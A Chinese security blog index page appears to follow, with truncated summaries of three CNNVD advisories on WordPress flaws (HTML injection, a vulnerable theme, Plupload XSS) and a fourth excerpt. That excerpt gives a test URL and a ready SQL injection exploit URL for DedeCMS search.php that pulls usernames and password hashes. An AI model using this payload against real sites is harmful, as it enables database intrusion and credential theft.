摘要:
漏洞名称:WordPress 多个安全漏洞CNNVD编号:CNNVD-201301-532发布时间:2013-01-30更新时间:2013-01-30危害等级: 漏洞类型:输入验证威胁类型:远程CVE编号:漏洞来源:Jon Cave, Gennady Kovshenin and Ryan DewhurstWordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。 WordPress早期版本至3.5.1版本中存在信息泄露漏洞和多个HTML注入漏洞。攻击者利用这些漏洞在受影响浏览器上下文中运行恶意的HTML和脚本代码,潜在的允许攻击者窃取 阅读全文
摘要:
漏洞名称:WordPress Chocolate WP 主题多个安全漏洞CNNVD编号:CNNVD-201301-536发布时间:2013-01-30更新时间:2013-01-30危害等级: 漏洞类型:威胁类型:远程CVE编号:漏洞来源:Eugene DokukinWordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。 WordPress中的Chocolate WP主题中存在多个安全漏洞。攻击者利用这些漏洞导致拒绝服务状态,上传任意文件到受影响计算机,或在受影响站点上下文中不知情用户浏览器上执行任意脚本代码。窃取基于cookie认 阅读全文
摘要:
漏洞名称:WordPress Plupload插件未明跨站脚本漏洞CNNVD编号:CNNVD-201301-531发布时间:2013-01-30更新时间:2013-01-30危害等级: 漏洞类型:跨站脚本威胁类型:远程CVE编号:漏洞来源:MoxiecodeWordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。 WordPress中的Plupload插件早期版本至1.5.5版本中存在未明跨站脚本漏洞。攻击者利用该漏洞在受影响站点上下文中不知情用户浏览器上执行任意脚本代码,可窃取基于cookie认证证书进而发起其他攻击。 ... 阅读全文
摘要:
测试例子:提交webshell.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a看结果如果提示Safe Alert: Request Error step 2 !那么直接用下面的expwebshell.cc/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,3 阅读全文